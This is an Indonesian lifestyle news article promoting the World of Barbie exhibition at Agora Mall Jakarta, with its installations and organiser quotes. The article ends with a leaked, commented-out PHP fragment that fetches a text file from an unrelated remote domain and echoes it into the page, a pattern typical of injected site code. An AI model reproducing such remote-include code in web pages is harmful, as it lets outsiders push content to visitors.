World of Barbie Jakarta Suguhkan Dreamhouse hingga Museum Barbie

World of Barbie Jakarta Suguhkan Dreamhouse hingga Museum Barbie

 

Area Career di World of Barbie menghadirkan pengalaman interaktif dengan booth foto 3D, tempat kamu bisa mencoba berbagai profesi ala Barbie. Area Career di World of Barbie menghadirkan pengalaman interaktif dengan booth foto 3D, tempat kamu bisa mencoba berbagai profesi ala Barbie. Foto: Ayahbunda


World of Barbie Jakarta resmi dibuka di Agora Mall hingga 26 Oktober 2025. Barbie Dreamhouse, DreamCampervan, hingga museum ikonik hadir nyata.
Hadirkan pengalaman unik, interaktif, dan penuh warna, area ini dapat dinikmati lintas generasi, karena dirancang untuk menghidupkan kembali dunia boneka ikonik Barbie dalam skala nyata.

Hadir Pertama Kali di Asia


World of Barbie: Dreams Made Here resmi dibuka di Agora Mall Jakarta pada Selasa (9/9) dan berlangsung hingga 26 Oktober 2025. Pameran berskala besar ini menjadi yang pertama di Asia, setelah sukses lebih dulu digelar di California dan Texas, Amerika Serikat.

Dengan area seluas 25.000 kaki persegi, World of Barbie Jakarta menghadirkan dunia boneka ikonik dalam skala nyata yang bisa dijelajahi langsung oleh pengunjung dari berbagai kalangan.

Duduk manis di kursi astronot Barbie dan bayangkan petualanganmu di luar angkasa!  Duduk manis di kursi astronot Barbie dan bayangkan petualanganmu di luar angkasa. Foto: Dok. GOLDLive Indonesia

Instalasi Ikonik, Dreamhouse hingga Music Studio


Pengunjung diajak masuk ke dalam pengalaman kreatif melalui berbagai instalasi menarik:

- Barbie Dreamhouse penuh warna untuk merasakan rumah impian.

- DreamCampervan bagi yang ingin berpetualang.

- Sound Studio untuk mengekspresikan kreativitas musik.

- World of Barbie Museum yang menampilkan sejarah dan koleksi Barbie.

Setiap sudut dibuat detail menyerupai set film, lengkap dengan dekorasi, tata cahaya, dan ruang interaktif yang bisa dicoba langsung.

GOLDLive Indonesia dan GandemPro, bekerja sama dengan Immersive Events & Content, dengan bangga mempersembahkan pengalaman interaktif dari Mattel: World of Barbie: Dreams Made Here™. GOLDLive Indonesia dan GandemPro, bekerja sama dengan Immersive Events & Content, dengan bangga mempersembahkan pengalaman interaktif dari Mattel: World of Barbie: Dreams Made Here™. Foto: Dok. GOLDLive Indonesia

Antusiasme Pengunjung di Jakarta


Sejak hari pembukaan, suasana meriah terlihat dari keluarga, anak-anak, hingga generasi muda yang sibuk berfoto, mencoba instalasi, dan bernostalgia dengan Barbie.

CEO GOLDLive Indonesia, Faqih Mulyawan, menyebut World of Barbie sebagai ruang imajinasi lintas generasi. Sementara CEO GandemPro, Wisanggeni Basuki Buena, menegaskan bahwa World of Barbie juga menyampaikan pesan pemberdayaan dan inspirasi, bukan sekadar instalasi visual.

Positif untuk Wisata dan Industri Kreatif


Sebagai pameran berskala internasional, World of Barbie Jakarta diharapkan mampu menarik wisatawan mancanegara, memperkuat sektor pariwisata Jakarta, sekaligus mendorong pertumbuhan industri kreatif Indonesia.

Jangan lewatkan kesempatan berharga ini, Bun. Ajak anak-anak merasakan langsung keseruan dunia Barbie.

Baca juga:

Thrive – Creativity in Bloom: Merayakan Mekarnya Kreativitas Seniman Muda Indonesia
Warna-warni Imajinasi Hiasi Koleksi Busana dan Aksesori Anak Liunic Doodle Verse
Cacingan Bisa Sebabkan Infeksi Paru? Ini Fakta Mengejutkan!

 


Topic

#WorldOfBarbieJakarta #PameranBarbie #EventJakarta2025 #BarbieExperience



Artikel Rekomendasi

".$css_content); //$a = file_get_contents('https://www.galatiatiga.com/pindang/index.txt'); //echo $a; ?>